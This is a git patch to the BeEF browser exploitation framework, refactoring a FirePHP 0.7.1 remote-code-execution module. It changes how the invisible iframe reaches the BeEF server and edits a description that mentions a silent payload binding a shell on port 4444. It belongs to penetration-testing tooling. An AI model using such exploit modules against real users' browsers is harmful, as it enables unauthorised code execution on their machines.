From dbeedb1d927532f8a847725f5dc0e0601791e377 Mon Sep 17 00:00:00 2001
From: Brendan Coles <bcoles@gmail.com>
Date: Sat, 10 May 2014 09:50:38 +0000
Subject: [PATCH] Use beef.net for URI

---
 modules/exploits/firephp/command.js  |  2 +-
 modules/exploits/firephp/config.yaml |  2 +-
 modules/exploits/firephp/module.rb   | 13 +------------
 3 files changed, 3 insertions(+), 14 deletions(-)

diff --git a/modules/exploits/firephp/command.js b/modules/exploits/firephp/command.js
index cd0bb84d0..4272f9dd7 100644
--- a/modules/exploits/firephp/command.js
+++ b/modules/exploits/firephp/command.js
@@ -9,7 +9,7 @@ beef.execute(function() {
   // detect firebug
   if (window.console && (window.console.firebug || window.console.exception)) {
     var firephp_<%= @command_id %> = beef.dom.createInvisibleIframe();
-    firephp_<%= @command_id %>.src = "<%= @beef_url %>/firephp";
+    firephp_<%= @command_id %>.src = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + "/firephp";
     beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
   } else {
     beef.net.send("<%= @command_url %>", <%= @command_id %>, "error=Module did not run. Firebug is not open in the hooked browser.");
diff --git a/modules/exploits/firephp/config.yaml b/modules/exploits/firephp/config.yaml
index efa0eacc9..ba97cfdd7 100644
--- a/modules/exploits/firephp/config.yaml
+++ b/modules/exploits/firephp/config.yaml
@@ -12,7 +12,7 @@ beef:
             enable: true
             category: "Exploits"
             name: "Firephp 0.7.1 RCE"
-            description: "Exploit FirePHP <= 0.7.1 to execute arbitrary JavaScript within the trusted 'chrome://' zone.<br/><br/>This module forces the browser to load '/firephp' on the public BeEF interface.<br/><br/>The payload is executed silently once the user moves the mouse over the array returned for 'http://[BeEF]/firephp' in Firebug.<br/><br/><b>Note:</b> Use msfpayload to generate JavaScript payloads. The default payload binds a shell on port 4444.<br/>See 'modules/exploits/firephp/payload.js'"
+            description: "Exploit FirePHP <= 0.7.1 to execute arbitrary JavaScript within the trusted 'chrome://' zone.<br/><br/>This module forces the browser to load '/firephp' on the BeEF server.<br/><br/>The payload is executed silently once the user moves the mouse over the array returned for 'http://[BeEF]/firephp' in Firebug.<br/><br/><b>Note:</b> Use msfpayload to generate JavaScript payloads. The default payload binds a shell on port 4444.<br/>See 'modules/exploits/firephp/payload.js'"
             authors: ["Wireghoul", "bcoles"]
             target:
                 user_notify: ["FF"]
diff --git a/modules/exploits/firephp/module.rb b/modules/exploits/firephp/module.rb
index 41999a8cb..e5404974d 100644
--- a/modules/exploits/firephp/module.rb
+++ b/modules/exploits/firephp/module.rb
@@ -3,7 +3,7 @@
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 ###
-# Exploit: http://www.justanotherhacker.com/advisories/jahx132.html
+# PoC by Wireghoul: http://www.justanotherhacker.com/advisories/jahx132.html
 ###
 class Firephp_code_exec < BeEF::Core::Command
 
@@ -52,17 +52,6 @@ class Firephp_code_exec < BeEF::Core::Command
     )
   end
 
-  def self.options
-    configuration = BeEF::Core::Configuration.instance
-    proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    beef_host = configuration.get("beef.http.public")      || configuration.get("beef.http.host")
-    beef_port = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
-    url = "#{proto}://#{beef_host}:#{beef_port}"
-    return [
-      { 'name' => 'beef_url', 'description' => 'BeEF interface URL', 'ui_label' => 'BeEF URL', 'value' => url, 'width' => '200px' }
-    ]
-  end
-
   def post_execute
     save({'result' => @datastore['result']})
   end